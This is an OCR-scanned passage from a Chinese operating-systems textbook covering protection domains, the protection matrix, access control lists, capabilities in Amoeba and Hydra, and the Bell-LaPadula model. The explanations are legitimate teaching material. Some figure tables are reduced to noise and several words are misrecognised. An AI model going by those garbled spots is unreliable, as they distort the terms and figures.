须 也 可 以 在 需要 的 时 候 使 得 受到 限制 的 进程 执行 某 些 合法 的 操作 子 集 。 如 进程 A 可 以 对 文件 E 有 读 的 权 
限 ， 但 没有 写 的 权限 。 

为 了 讨论 不 同 的 保护 机 制 ， 很 有 必要 介绍 一 下 域 的 概念 。 域 (domain) # (HR, AMR) 对 的 集合 。 
每 一 对 组 合 指定 一 个 对 象 和 一 些 可 在 其 上 运行 的 操作 子 集 。 这 里 权限 (right) 是 指 对 某 个 操作 的 执行 许可 。 
通常 域 相当 于 单个 用 户 ， 告 诉 用 户 可 以 做 什么 不 可 以 做 什么 ， 当 然 有 时 域 的 范围 比 用 户 要 更 广 。 例 如 ， 
一 组 为 某 个 项 目 编写 代码 的 人 员 可 能 都 属于 相同 的 一 个 域 ， 以 便于 他 们 都 有 权 读 写 与 该 项 目 相关 的 文件 。 

对 象 如 何 分 配给 域 由 需求 来 确定 。 一 个 最 
基本 的 原则 就 是 最 低 权限 原则 (Principle of 
Least Authority，POLA ) ， 一 般 而 言 ， 当 每 个 域 
都 拥有 最 少数 量 的 对 象 和 满足 其 完成 工作 所 需 的 
最 低 权 限时 ， 安 全 性 将 达到 最 好 。 

图 9-3 给 出 了 3 种 域 ， 每 一 个 域 里 都 有 一 些 对 
象 ， 每 一 个 对 象 都 有 些 不 同 的 权限 〈 读 、 写 、 执 ee eee 
行 )。 请 注意 打印 机 1 同时 存在 于 两 个 域 中 ， 且 在 
每 个 域 中 具有 相同 的 权限 。 文 件 1 同样 出 现在 两 个 域 中 ， 但 它 在 两 个 域 中 却 具 有 不 同 的 权限 。 

任何 时 间 ， 每 个 进程 会 在 某 个 保护 域 中 运行 。 换 句 话 说 ， 进 程 可 以 访问 某 些 对 象 的 集合 ， 每 个 对 象 
都 有 一 个 权限 集 。 进 程 运行 时 也 可 以 在 不 同 的 域 之 间 切 换 。 域 切换 的 规则 很 大 程度 上 与 系统 有 关 。 © 

为 了 更 详细 地 了 解 域 ， 让 我 们 来 看 看 UNIX 系 统 (包括 Linux、FreeBSD 以 及 一 些 相 似 的 系统 )。 在 
UNIX 中 ， 进 程 的 域 是 由 UID 和 GID 定 义 的 。 给 定 某 个 (UID, GID) 的 组 合 ， 就 能 够 得 到 可 以 访问 的 所 
有 对 象 列表 (文件 ， 包 括 由 特殊 文件 代表 的 IO 设备 等 ) ， 以 及 它们 是 否 可 以 读 、 写 或 执行 。 使 用 相同 
(UID, GID) 组 合 的 两 个 进程 访问 的 是 完全 一 致 的 对 象 集合 。 使 用 不 同 (UID, GID) 值 的 进程 访问 的 
是 不 同 的 文件 集合 ， 虽 然 这 些 文件 有 大 量 的 重 又 。 

而 且 ， 每 个 UNIX 的 进程 有 两 个 部 分 : 用 户 部 分 和 核心 部 分 。 当 执行 系统 调用 时 ， 进 程 从 用 户 部 分 
切换 到 核心 部 分 。 核 心 部 分 可 以 访问 与 用 户 部 分 不 同 的 对 象 集 。 例 如 ， 核 心 部 分 可 以 访问 所 有 物理 内 存 
的 页 面 、 整 个 磁盘 和 其 他 所 有 被 保护 的 资源 。 这 样 ， 系 统 调用 就 引发 了 域 切换 。 

当 进 程 把 SETUID 或 SETGID 位 置 于 on 状态 时 可 以 对 文件 执行 exec 操 作 ， 这 时 进程 获得 了 新 的 有 效 
UID 或 GID。 不 同 的 (UID, GID) 组 合 会 产生 不 同 的 文件 和 操作 集 。 使 用 SETUID 或 SETGID 运 行程 序 
也 是 一 种 域 切换 ， 因 为 可 用 的 权限 改变 了 。 
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一 个 很 重要 的 问题 是 系统 如 何 跟 踪 并 确定 哪个 对 象 属 于 哪个 域 。 从 概念 来 说 ， 至 少 可 以 预想 一 个 大 矩 
阵 ， 和 矩阵 的 行 代表 域 ， 列 代表 对 象 。 每 个 方块 列 出 对 象 的 域 中 包含 的 或 可 能 有 的 权限 。 图 9-3 的 矩阵 如 图 9- 
4 所 示 。 有 了 和 矩阵 和 当前 的 域 编号 ， 系 统 就 能 够 判断 是 否 可 以 从 指定 的 域 以 特定 的 方式 访问 给 定 的 对 象 。 


WTR 
文件 1 ”文件 2 文件 3 ”文件 4 文件 5 XFS ”打印 机 1 绘 仪 图 2 


域 
cat 






图 9-4 保护 矩阵 


域 的 自我 切换 在 矩阵 模型 中 能 够 很 容易 实现 ， 可 以 通过 使 用 操作 enter 把 域 本 身 作为 对 象 。 图 9-5 再 
次 显示 了 图 9-4 的 矩阵 ， 只 不 过 把 3 个 域 当 作 了 对 象 本 身 。 域 1 中 的 进程 可 以 切换 到 域 ?2 中 ， 但 是 一 旦 切换 
后 就 不 能 返回 。 这 种 切换 方法 是 在 UNIX 里 通过 执行 SETUID 程 序 实现 的 。 不 允许 其 他 的 域 切换 。 


对 象 
文件 1 文件 2 文件 3 文件 4 文件 5 文件 6 打印 机 1 绘 仪 图 2 域 ! 域 2 域 3 


TT E 
执行 


图 9-5 将 域 作为 对 象 的 保护 矩阵 






9.3.2 访问 控制 列表 

在 实际 应 用 中 ， 很 少 会 存储 如 图 9-5 的 矩阵 ， 因 为 矩阵 过 大 、 过 于 稀疏 。 大 多 数 的 域 都 不 能 访问 大 
多 数 的 对 象 ， 所 以 存储 一 个 维度 极 大 却 很 稀 疏 的 矩阵 浪费 空间 。 但 是 也 有 两 种 方法 是 可 行 的 。 一 种 是 按 
行 或 按 列 存放 ， 而 仅仅 存放 非 空 的 元 素 。 这 两 种 方法 有 着 很 大 的 不 同 。 这 一 节 将 介绍 按 列 存放 的 方法 ， 
下 一 节 再 介绍 按 行 存 放 。 

第 一 种 方法 包括 一 个 关联 于 每 个 对 象 的 《有 序 ) 列表 ， 列 表 里 包含 了 所 有 可 访问 对 象 的 域 以 及 这 些 
域 如 何 访问 这 些 对 象 的 方法 。 这 一 列表 叫 作 访问 控制 列表 (Access Control List，ACL) ， 如 图 9-6 所 示 。 
这 里 我 们 看 到 了 三 个 进程 ， 每 一 个 都 属于 不 同 的 域 。A、B 和 C 以 及 三 个 文件 F1、F2 和 F3。 为 了 简便 ， 


用 户 
空间 


内 核 
空间 





图 9-6 用 访问 控制 列表 管理 文件 的 访问 
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我 们 假设 每 个 域 相 当 于 某 一 个 用 户 ， 即 用 户 A、B 和 C。 若 用 通常 的 安全 性 语言 表达 ， 用 户 被 叫 作 主 体 
(subject 或 principal) ， 以 便 与 它们 所 拥有 的 对 象 (如 文件 ) 区 分 开 来 。 

每 个 文件 都 有 一 个 相关 联 的 ACL。 文 件 F1 在 ACL 中 有 两 个 表 项 (用 分 号 区 分 )。 第 一 个 登录 项 表示 
任何 用 户 A 拥 有 的 进程 都 可 以 读 写 文件 。 第 二 个 表 项 表示 任何 用 户 B 拥 有 的 进程 都 可 以 读 文件 。 所 有 这 
些 用 户 的 其 他 访问 和 其 他 用 户 的 任何 访问 都 被 禁止 。 请 注意 这 里 的 权限 是 用 户 赋予 的 ， 而 不 是 进程 。 只 
要 系统 运行 了 保护 机 制 ， 用 户 A 拥 有 的 任何 进程 都 能 够 读 写 文件 F1。 系 统 并 不 在 乎 是 否 有 1 个 还 是 100 个 
进程 ， 所 关心 的 是 所 有 者 而 不 是 进程 ID。 

文件 F2 在 ACL 中 有 3 个 表 项 : A、B 和 C。 它 们 都 可 以 读 文 件 ， 而 且 B 还 可 以 写 文 件 。 除 此 之 外 ， 不 允 
许 其 他 的 访问 。 文 件 F3 很 明显 是 个 可 执行 文件 ， 因 为 B 和 C 都 可 以 读 并 执行 它 ，B 还 可 以 执行 写 操作 。 

这 个 例子 展示 了 使 用 ACL 进 行 保护 的 最 基本 形式 。 在 实际 中 运用 的 形式 要 复杂 得 多 。 为 了 简便 起 见 ， 
我 们 目前 只 介绍 了 3 种 权限 : 读 、 写 和 执行 。 当 然 还 有 其 他 的 权限 。 有 些 是 一 般 的 权限 ， 可 以 运用 于 所 
有 的 对 象 ， 有 些 是 对 象 特定 的 。 一 般 的 权限 有 destory object 和 copy object。 这 些 可 以 运用 于 任何 对 象 ， 
而 不 论 对 象 的 类 型 是 什么 。 与 对 象 有 关 的 特定 权限 包括 针对 邮箱 对 象 的 append message 和 针对 目录 对 
象 的 sort alphabetically ( 按 字 母 排序 ) 等 。 

到 目前 为 止 ， 我 们 的 ACL 表 项 是 针对 个 人 用 户 的 。 许 多 系统 也 支持 用 户 组 (group) 的 概念 。 组 可 
以 有 自己 的 名 字 并 包含 在 ACL 中 。 在 某 些 系统 中 ， 每 个 进程 除了 有 用 户 ID (UID) 外 , 还 有 组 ID (GID), 
在 这 类 系统 中 ， 一 个 ACL 表 项 包括 了 下 列 格式 的 条 目 : 

UID1, GID1: rights1; UID2, GID2: rights2;... 

在 这 样 的 条 件 下 ， 当 出 现 要 求 访 问 对 象 的 请 求 时 ， 必 须 使 用 调用 者 的 UID 和 GID 来 进行 检查 。 如 果 
它们 出 现在 ACL 中 ， 所 列 出 的 权限 就 是 可 行 的 。 如 果 (UID, GID) 的 组 合 不 在 列表 中 ， 访 问 就 被 拒绝 。 

使 用 组 的 方法 就 引入 了 角色 (role) 的 概念 。 如 在 某 次 系统 安装 后 ，Tana 是 系统 管理 员 ， 在 组 里 是 
sysadm。 但 是 假设 公司 里 也 有 很 多 为 员工 组 织 的 俱乐部 ， 

文件 J 访问 控制 列表 





而 Tana 是 养 铝 爱好 者 的 一 员 。 俱 乐 部 成 员 属 于 pigfan 组 并 

















可 访问 公司 的 计算 机 来 管理 鸽子 的 数据 。 那 么 ACL 中 的 | Recon gata | tat eee har AN 
一 部 分 会 如 图 9-7 所 示 。 rer 
如 果 Tana 想 要 访问 这 些 文件 ， 那 么 访问 的 成 功 与 否 aa iner 


将 取决 于 她 当前 所 登录 的 组 。 当 她 登录 的 时 候 ， 系 统 会 让 她 选择 想 使 用 的 组 ， 或 者 提供 不 同 的 登录 名 和 
密码 来 区 分 不 同 的 组 。 这 一 措施 的 目的 在 于 阻止 Tana 在 使 用 养 伍 爱 好 者 组 的 时 候 获 得 密码 文件 。 只 有 当 
她 登录 为 系统 管理 员 时 才 可 以 这 么 做 。 

在 有 些 情况 下 ， 用 户 可 以 访问 特定 的 文件 而 与 当前 登录 的 组 无 关 。 这 样 的 情况 将 引入 通配符 
(wildcard) 的 概念 ， 即 “任何 组 ”的 意思 。 如 ， 表 项 

tana, *: RW 


会 给 Tana 访 问 的 权限 而 不 管 她 的 当前 组 是 什么 。 

但 是 另 一 种 可 能 是 如 果 用 户 属于 任何 一 个 享有 特定 权限 的 组 ， 访 问 就 被 允许 。 这 种 方法 的 优点 是 ， 
属于 多 个 组 的 用 户 不 必 在 登录 时 指定 组 的 名 称 ， 所 有 的 组 都 被 计算 在 内 。 同 时 它 的 缺点 是 几乎 没有 提供 
封装 性 :Tana 可 以 在 召开 养 铝 俱 乐 部 会 议 时 编辑 密码 文件 。 

组 和 通配符 的 使 用 使 得 系统 有 可 能 有 选择 地 阻止 用 户 访问 某 个 文件 。 如 ， 表 项 

virgil, *: (none); *, *: RW 
给 Virgil 之 外 的 所 有 用 户 以 读 写 文件 的 权限 。 上 述 方法 是 可 行 的 ， 因 为 表 项 是 按 顺 序 扫描 的 ， 只 要 第 一 个 
被 采用 ， 后 续 的 表 项 就 不 需要 再 检查 。 在 第 一 个 表 项 为 Virgil 找 到 了 匹配 ， 然 后 找到 并 应 用 这 个 存 取 权限 ， 
在 本 例 中 为 (none)。 整 个 查找 在 这 时 就 中 断 了 。 实 际 上 ， 再 也 不 去 检查 剩 下 的 访问 权限 了 。 

还 有 一 种 处 理 组 用 户 的 方法 ， 无须 使 用 包含 (UID，GID) 对 的 ACL 表 项 ， 而 是 让 每 个 表 项 成 为 
UID 或 GID。 如 ， 针 对 文件 pigeon_data 的 表 项 

debbie: RW; phil: RW; pigfan: RW 
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表示 debbie、phil 以 及 其 他 所 有 pigfan 组 里 的 成 员 都 可 以 读 写 该 文件 。 

有 时 候 也 会 发 生 这 样 的 情况 ， 即 一 个 用 户 或 组 对 特定 文件 有 特定 的 权限 ， 但 文件 的 所 有 者 稍 后 又 想 
收回 。 通 过 访问 控制 列表 ， 收 回 过 去 赋予 的 访问 权 相 对 比较 简单 。 这 只 要 编辑 ACL 就 可 以 修改 了 。 但 是 
如 果 ACL 仅 仅 在 打开 某 个 文件 时 才 会 检查 ， 那 么 改变 它 以 后 的 结果 就 只 有 在 将 来 调用 open 命 令 时 才能 奏 
效 。 对 于 已 经 打开 的 文件 ， 就 会 仍然 持 有 原来 打开 时 拥有 的 权限 ， 即 使 用 户 已 经 不 再 具有 这 样 的 权限 。 


9.3.3 权能 字 

另 一 种 切 分 图 9-5 和 矩阵 的 方法 是 按 行 存储 。 在 使 用 这 种 方法 的 时 人 息 ， 与 每 个 进程 关联 的 是 可 访问 的 
对 象 列表 ， 以 及 每 个 对 象 上 可 执行 操作 的 指示 。 这 一 栏 叫 作 权 能 字 列 表 (capability list 或 C-list) ， 而 且 
每 个 单独 的 项 目 叫 作 权 能 字 (Dennis 和 Van Horn, 1966, Fabry, 1974) 。 三 个 进程 及 其 权能 字 列 表 如 
图 9-8 所 示 。 
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图 9-8 在 使 用 权能 字 时 ， 每 个 进程 都 有 一 个 权能 字 列 表 


每 一 个 权能 字 赋 予 所 有 者 针对 特定 对 象 的 权限 。 如 在 图 9-8 中 ， 用 户 A 所 拥有 的 进程 可 以 读 文 件 F1 
和 F2。 一 个 权能 字 通 常 包含 了 文件 (或 者 更 一 般 的 情况 下 是 对 象 ) 的 标识 符 和 用 于 不 同 权 限 的 位 图 。 在 
类 似 UNIX 的 系统 中 ， 文 件 标识 符 可 能 是 i 节点 号 。 权 能 字 列 表 本 身 也 是 对 象 ， 也 可 以 从 其 他 权能 字 列 表 
处 指定 ， 这 样 就 有 助 于 共享 子 域 。 1 

很 明显 权能 字 列 表 必 须 防 止 用 户 自 改 。 已 知 的 保护 方法 有 三 种 。 第 一 种 方法 需要 建立 带 标记 的 体系 
结构 (tagged architecture) ， 在 这 种 硬件 设计 中 ， 每 个 内 存 字 必须 拥有 额外 的 (或 标记 ) 位 来 判断 该 字 
是 否 包含 了 权限 字 。 标 记 位 不 能 被 算术 、 比 较 或 相似 的 指令 使 用 ， 它 仅 可 以 被 在 核心 态 下 运行 〈 即 操作 
系统 ) 的 程序 修改 。 人 们 已 经 构造 了 带 标 记 的 体系 结构 计算 机 ， 并 可 以 稳定 地 运行 (Feustal，1972)。 
IBM AS/400 就 是 一 个 公认 的 例子 。 

第 二 种 方法 是 在 操作 系统 里 保存 权能 字 列 表 。 随 后 根据 权能 字 在 列表 中 的 位 置 引 用 权能 字 。 某 个 进 
程 也 许 会 说 ;“ 从 权能 字 2 所 指向 的 文件 中 读 取 1KB。” 这 种 寻 址 方法 有 些 类 似 UNIX 里 的 文件 描述 符 。 
Hydra (Wulf 等 人 ，1974) 采用 的 就 是 这 种 方法 。 

第 三 种 方法 是 把 权能 字 列 表 放 在 用 户 空间 里 ， 并 用 加 密 方法 进行 管理 ， 这 样 用 户 就 不 能 自 改 它们 。 
这 种 方法 特别 适合 分 布 式 操作 系统 ， 并 可 按 下 述 方式 工作 。 当 客户 进程 发 送 消 息 到 远程 服务 器 (如 一 台 
文件 服务 器 ) ， 请 求 为 自己 创建 一 个 对 象 时 ， 服 务 器 会 在 创建 对 象 的 同时 创建 一 条 长 随机 码 作为 校 验 字 
段 附 在 该 对 象 上 。 文 件 服务 器 为 对 象 预 留 了 槽 口 ， 以 便 存 放 校 验 字 段 和 磁盘 扇 区 地 址 等 。 在 UNIX 术 语 
中 ， 校 验 字 段 存放 在 服务 器 的 i 节 


点 中 。 校 验 字 段 不 会 返回 给 用 户 ， “| 服务 器 标识 符 | ”对象 号 “| 权限 
rra A AC OETI 
生成 并 回 送 给 用 户 如 图 9-9 所 示 格 图 9-9 采用 了 密码 保护 的 权能 字 
式 的 权能 字 。 

返回 给 用 户 的 权能 字 包 括 服务 器 标识 符 、 对 象 号 (服务 器 列表 索引 ， 主 要 是 i 节点 号 ) 以 及 以 位 图 
形式 存放 的 权限 。 对 一 个 新 建 的 对 象 来 说 ， 所 有 的 权限 位 都 是 处 于 打开 状态 的 ， 这 显然 是 因为 该 对 象 的 


z s 345 





拥有 者 有 权限 对 该 对 象 做 任何 事情 。 最 后 的 字段 包含 了 对 象 、 权 限 以 及 校 验 字段 ， 通 过 加 密 安全 单 向 函 
Bef 得 到 。 加 密 安全 单 向 函数 y = f (x) 是 这 样 的 函数 : 对 于 给 定 的 x， 很 容易 计算 出 y， 然 而 对 于 给 定 的 y， 
不 能 计算 出 x。 就 目前 而 言 ， 对 于 一 个 良好 的 单 向 函数 来 说 ， 即 使 一 个 攻击 者 知道 了 权能 字 的 其 他 所 有 
字段 ， 也 不 能 猜测 出 检验 字段 。 

当 用 户 想 访问 对 象 时 ， 首 先 要 把 权能 字 作 为 发 送 请 求 的 一 部 分 传送 到 服务 器 。 然 后 服务 器 提取 对 象 
号 并 通过 服务 器 列表 索引 找到 对 象 。 再 计算 六 (对 象 ， 权 限 ， 校 验 字段 ) 。 前 两 个 参数 来 自 于 权能 字 本 身 ， 
而 第 三 个 参数 来 自 于 服务 器 表 。 如 果 计 算 值 符合 权能 字 的 第 四 个 字段 ， 请 求 就 被 接受 ， 否 则 被 拒绝 。 如 
果 用 户 想 要 访问 其 他 人 的 对 象 ， 他 就 不 能 伪造 第 四 个 字段 的 值 ， 因 为 他 不 知道 校 验 字段 ， 所 以 请 求 将 被 
拒绝 。 

用 户 可 以 要 求 服务 器 生成 一 个 较 弱 的 权能 字 ， 如 只 读 访问 。 服 务 器 首先 检查 权能 字 的 合法 性 ， 检 查 
成 功 则 计算 f (对 象 ， 新 的 权限 ， 校 验 字段 ) 并 产生 新 的 权能 字 放 人 第 四 个 字段 中 。 请 注意 原来 的 校 验 
值 仍 在 使 用 ， 因 为 其 他 较 强 的 权能 字 仍 然 需要 该 校 验 值 。 

新 的 权能 字 被 发 送 回 请 求 进程 。 现 在 用 户 可 以 在 消息 中 附加 该 权能 字 发 送 到 朋友 处 。 如 果 朋 友 打 开 
了 应 该 被 关闭 的 权限 位 ， 服 务 器 就 会 在 使 用 权限 字 时 检测 到 ， 因 为 的 值 与 错误 的 权限 位 不 能 对 应 。 既 
然 朋 友 不 知道 真正 的 校 验 字段 ， 他 就 不 能 伪造 与 错误 的 权限 位 相对 应 的 权能 字 。 这 种 方法 最 早 是 由 
Amoeba 系 统 (Tanenbaum 等 人 , 1990) 开发 的 ， 后 被 广泛 使 用 。 

除了 特定 的 与 对 象 相关 的 权限 (如 读 和 执行 操作 ) Sb, 权能 字 中 (包括 在 核心 态 和 密码 保护 模式 下 ) 
通常 包含 一 些 可 用 于 所 有 对 象 的 普通 权限 。 这 些 普通 权限 有 : 

1) 复制 权能 字 : 为 同一 个 对 象 创 建新 的 权能 字 。 

2) 复制 对 象 : 用 新 的 权能 字 创 建 对 象 的 副本 。 

3) 移 除权 能 字 : 从 权能 字 列 表 中 删 去 表 项 ， 不 影响 对 象 。 

4) 销毁 对 象 : 永久 性 地 移 除 对 象 和 权能 字 。 

最 后 值得 说 明 的 是 ， 在 核心 管理 的 权能 字 系统 中 ， 撤 回 对 对 象 的 访问 是 十 分 困难 的 。 系 统 很 难为 任意 
对 象 找到 它 所 有 显著 的 权能 字 并 撤回 ， 因 为 它们 存储 在 磁盘 各 处 的 权能 字 列 表 中 。 一 种 办 法 是 把 每 个 权能 
字 指向 间接 对 象 而 不 是 对 象 本 身 ， 再 把 间接 对 象 指向 真正 的 对 象 ， 这 样 系统 就 能 打 断 连接 关系 使 权能 字 无 
效 。( 当 指向 间接 对 象 的 权能 字 后 来 出 现在 系统 中 时 ， 用 户 将 发 现 间接 对 象 指向 的 是 一 个 空 的 对 象 。) 

在 Amoeba 系 统 结构 中 ， 撤 回 权 能 字 是 十 分 容易 的 。 要 做 的 仅仅 是 改变 存放 在 对 象 里 的 校 验 字段 。 
只 要 改变 一 次 就 可 以 使 所 有 的 失效 。 但 是 没有 一 种 机 制 可 以 有 选择 性 地 撤回 权能 字 ， 如 ， 仅 撤回 John 的 
许可 权 ， 但 不 撤回 其 他 人 的 。 这 一 缺陷 也 被 认为 是 权能 字 系 统 的 一 个 主要 问题 。 

另 一 个 主要 问题 是 确保 合法 权能 字 的 拥有 者 不 会 给 他 最 好 的 朋友 1000 个 副本 。 采 用 核心 管理 权 
能 字 的 模式 ， 如 Hydra 系 统 ， 这 个 问题 得 到 解决 。 但 在 如 Amoeba 这 样 的 分 布 式 系统 中 却 无 法 解决 这 
个 问题 。 

总 之 ，ACL 和 权能 字 具 有 一 些 彼 此 互补 的 特性 。 权 能 字 相 对 来 说 效率 较 高 ， 因 为 进程 在 要 求 “打开 
由 权能 字 3 所 指向 的 文件 ”时 无 须 任何 检查 ， 而 采用 ACL 时 需要 进行 搜索 操作 (时 间 可 能 很 长 )， 如 果 系 
统 不 支持 用 户 组 的 话 ， 赋 了 予 每 个 用 户 读 文件 的 权限 就 需要 在 ACL 中 列举 所 有 的 用 户 。 权 能 字 还 可 以 十 分 
容易 地 封装 进程 ， 而 ACL 却 不 能 。 另 一 方面 ，ACL 支 持 有 选择 地 撤回 权限 ， 而 权能 字 不 行 。 最 后 ， 如 果 
对 象 被 删除 时 权能 字 未 被 删除 ， 或 者 权能 字 被 删除 时 对 象 未 被 删除 ， 问 题 就 会 发 生 ， 而 ACL 不 会 产生 这 
样 的 问题 。 

大 部 分 用 户 对 ACL 比 较 熟 悉 ， 因 为 它们 在 操作 系统 (例如 Windows 和 UNIX) 中 较为 常见 。 其 实 ， 
权能 字 也 并 不 是 不 常见 。 例 如 ， 运 行 在 很 多 厂商 (通常 是 基于 其 他 的 操作 系统 ， 如 Android) 智能 手机 
上 的 L4 内 核 是 基于 权能 字 的 。 类 似 地 ，FreeBSD 中 使 用 了 Capsicum， 把 权能 字 引 入 了 UNIX 家 族 。 


94 安全 系统 的 形式 化 模型 


诸如 图 9-4 的 保护 矩阵 并 不 是 静态 的 ， 它 们 通常 随 着 创建 新 的 对 象 、 销 毁 旧 的 对 象 而 改变 ， 而 且 所 
有 者 决定 对 象 的 用 户 集 的 增加 或 限制 。 人 们 把 大 量 的 精力 花费 在 建立 安全 系统 模型 上 ， 这 种 模型 中 的 保 
护 矩 阵 处 于 不 断 的 变化 之 中 。 在 本 节 的 稍 后 部 分 ， 我 们 将 简单 介绍 这 方面 的 工作 原理 。 
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几 十 年 前 ，Harrison 等 人 (1976) 在 保护 矩阵 上 确定 了 6 种 最 基本 的 操作 ， 这 些 操 作 可 用 作 任 何 安 
全 系统 模型 的 基准 。 这 些 最 基本 的 操作 是 create object、delete object、create domain、delete 
domain, insert right 和 remove right。 最 后 的 两 种 插入 和 删除 权限 操作 来 自 于 特定 的 矩阵 单元 ， 如 赋予 
域 1 读 文 件 6 的 许可 权 。 

上 述 6 种 操作 可 以 合并 为 保护 命令 。 用 户 程序 可 以 运行 这 些 命令 来 改变 保护 矩阵 。 它 们 不 可 以 直接 
执行 最 原始 的 操作 。 例 如 ， 系 统 可 能 有 一 个 创建 新 文件 的 命令 ， 该 命令 首先 查看 该 文件 是 否 已 存在 ， 如 
果 不 存在 就 创建 新 的 对 象 并 赋予 所 有 者 相应 的 权限 。 当 然 也 可 能 有 一 个 命令 允许 所 有 者 赋予 系统 中 所 有 
用 户 读 取 该 文件 的 权限 。 实 际 上 ， 只 要 在 每 个 域 中 插入 该 文件 的 “ 读 ” 权 限 项 即 可 。 

此 刻 ， 保 护 矩 阵 决定 了 在 任何 域 中 的 一 个 进程 可 以 执行 哪些 操作 ， 而 不 是 被 授权 执行 哪些 操作 。 拢 
阵 是 由 系统 控制 的 ， 而 授权 与 管理 策略 有 关 。 为 了 说 明 其 差别 ， 我 们 看 一 看 图 9-10 中 域 与 用 户 相对 应 的 
例子 。 在 图 9-10a 中 ， 我 们 看 到 了 既定 的 保护 策略 : Henry 可 以 读 写 Mailbox7，Robert 可 以 读 写 Secret， 所 
有 的 用 户 可 以 读 和 执行 Compiler。 


WR 对 象 


Compiler Mailbox 7 Secret Compiler Mailbox 7 Secret 

ea 

panas] | 
a) 


图 9-10 a) 授权 后 的 状态 ，b) 未 授权 的 状态 


现在 假设 Robert 非 常 聪 明 ， 并 找到 了 一 种 方法 发 出 命令 把 保护 矩阵 改 为 如 图 9-10b 所 示 。 现 在 他 就 
可 以 访问 Mailbox7 了 ， 这 是 他 本 来 未 被 授权 的 。 如 果 他 想 读 文件 ， 操 作 系统 就 可 以 执行 他 的 请 求 ， 因 为 
操作 系统 并 不 知道 图 9-10b 的 状态 是 未 被 授权 的 。 

很 明显 , 所 有 可 能 的 矩阵 被 划分 为 两 个 独立 的 集合 : 所 有 处 于 授权 状态 的 集合 和 所 有 未 授权 的 集合 。 
大 量 理 论 研究 提出 这 样 一 个 问题 : 给 定 一 个 初始 的 授权 状态 和 命令 集 ， 是 否 能 证 明 系 统 永 远 不 能 达到 未 
授权 的 状态 ? 

实际 上 ， 我 们 是 在 询问 可 行 的 安全 机 制 (保护 命 令 ) 是 否 足以 强制 某 些 安全 策略 。 给 定 了 这 些 安全 
策略 、 最 初 的 矩阵 状态 和 改变 这 些 和 矩阵 的 命令 集 ， 我 们 希望 可 以 找到 建立 安全 系统 的 方法 。 这 样 的 证 明 
过 程 是 非常 困难 的 : 许多 一 般 用 途 的 系统 在 理论 上 是 不 安全 的 。Harrison 等 人 (1976) 曾经 证 明 在 任意 
保护 系统 的 任意 配置 中 ， 其 安全 性 从 理论 上 来 说 是 不 确定 的 。 但 是 对 特定 系统 来 说 ， 有 可 能 证 明 系 统 可 
以 从 授权 状态 转移 到 未 授权 状态 。 要 获得 更 多 的 信息 请 看 Landwehr (1981), 


9.4.1 多 级 安全 

大 多 数 操作 系统 允许 个 人 用 户 来 决定 谁 可 以 读 写 他 们 的 文件 和 其 他 对 象 。 这 一 策略 称 为 可 自由 支配 
的 访问 控制 (discretionary access control) 。 在 许多 环境 下 ， 这 种 模式 工作 很 稳定 ， 但 也 有 些 环境 需要 更 
高 级 的 安全 ， 如 军 方 、 企 业 专利 部 门 和 医院 。 在 这 类 环境 里 ， 机 构 定义 了 有 关 谁 可 以 看 什么 的 规则 ， 这 
些 规则 是 不 能 被 士兵 律师 或 医生 改变 的 ， 至 少 没有 老板 (或 者 老板 的 律师 ) 的 许可 是 不 允许 的 。 这 类 
环境 需要 强制 性 的 访问 控制 (mandatory access control) 来 确保 所 阐明 的 安全 策略 被 系统 强制 执行 ， 而 
不 是 可 自由 支配 的 访问 控制 。 这 些 强制 性 的 访问 控制 管理 整个 信息 流 ， 确 保 不 会 泄漏 那些 不 应 该 泄漏 的 
信息 。 

1. Bell-LaPadula 模 型 

最 广泛 使 用 的 多 级 安全 模型 是 Bell-LaPadula 模 型 ， 我 们 将 看 看 它 是 如 何 工 作 的 (Bell 和 LaPadula, 
1973)。 这 一 模型 最 初 为 管理 军 方 安全 系统 而 设计 ， 现 在 被 广泛 运用 于 其 他 机 构 。 在 军 方 领域 ,文档 (对 
象 ) 有 一 定 的 安全 等 级 ， 如 内 部 级 、 秘 密级 、 机 密级 和 绝密 级 。 每 个 人 根据 他 可 阅读 文档 的 不 同 也 被 指 
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定 为 不 同 的 密级 。 如 将 军 可 能 有 权 读 取 所 有 的 文档 ， 而 中 尉 可 能 只 被 限制 在 秘密 级 或 更 低 的 文档 。 代 表 
用 户 运行 的 进程 具有 该 用 户 的 安全 密级 。 由 于 该 系统 拥有 多 个 安全 等 级 ， 所 以 被 称 为 多 级 安全 系统 。 

Bell-LaPadula 模 型 对 信息 流 做 出 了 一 些 规定 : 

1) 简易 安全 规则 :在 密级 k 上 面 运 行 的 进程 只 能 读 取 同 一 密级 或 更 低 密 级 的 对 象 。 例 如 ， 将 军 可 以 
读 取 中 尉 的 文档 ， 但 中 尉 却 不 可 以 读 取 将 军 的 文档 。 

2) * 规 则 : 在 密级 k 上 面 运 行 的 进程 只 能 写 同 一 密级 或 更 高 密级 的 对 象 。 例 如 ， 中 尉 只 能 在 将 军 的 信 
箱 添 加 信息 告知 自己 所 知 的 全 部 ， 但 是 将 军 不 能 在 中 尉 的 信箱 里 添加 信息 告知 自己 所 知 的 全 部 ， 因 为 将 
军 拥有 绝密 的 文档 ， 这 些 文档 不 能 泄露 给 中 尉 。 

简 而 言 之 ， 进 程 既 可 下 读 也 可 上 写 ， 但 不 能 颠倒 。 如 果 系 统 严格 地 执行 上 述 两 条 规则 ， 那 么 就 不 会 有 
信息 从 高 一 级 的 安全 层 泄露 到 低 一 级 的 安全 层 。 之 所 以 用 * 代表 这 种 规则 是 因为 在 最 初 的 论文 里 ， 作 者 没有 
想 出 更 好 的 名 字 ， 所 以 只 能 用 * 临时 替代 。 但 是 最 终 作 者 也 没有 想 出 更 好 的 名 字 ， 所 以 在 打印 论文 时 用 了 
*。 在 这 一 模型 中 ， 进 程 可 以 读 写 对 象 ， 但 不 能 直接 相互 通信 。Bell-LaPadula 模 型 的 图 解 如 图 9-11 所 示 。 


安全 级 别 





图 9-11 Bell-LaPadula 多 级 安全 模型 


在 图 中 ， 从 对 象 到 进程 的 ( 实 线 ) 箭头 代 该 进程 正在 读 取 对 象 ， 也 就 是 说 ,信息 从 对 象 流向 进程 。 
同样 ， 从 进程 到 对 象 的 (虚线 ) 箭头 代表 进程 正在 写 对 象 ， 也 就 是 说 ， 信 息 从 进程 流向 对 象 。 这 样 所 有 
的 信息 流 都 沿 着 箭头 方向 流动 。 例 如 ， 进 程 B 可 以 从 对 象 1 读 取信 息 但 却 不 可 以 从 对 象 3 读 取 。 

简易 安全 规则 显示 ， 所 有 的 实 线 ( 读 ) 箭头 横向 运动 或 向 上 ; * 规则 显示 ， 所 有 的 虚线 第 头 ( 写 ) 
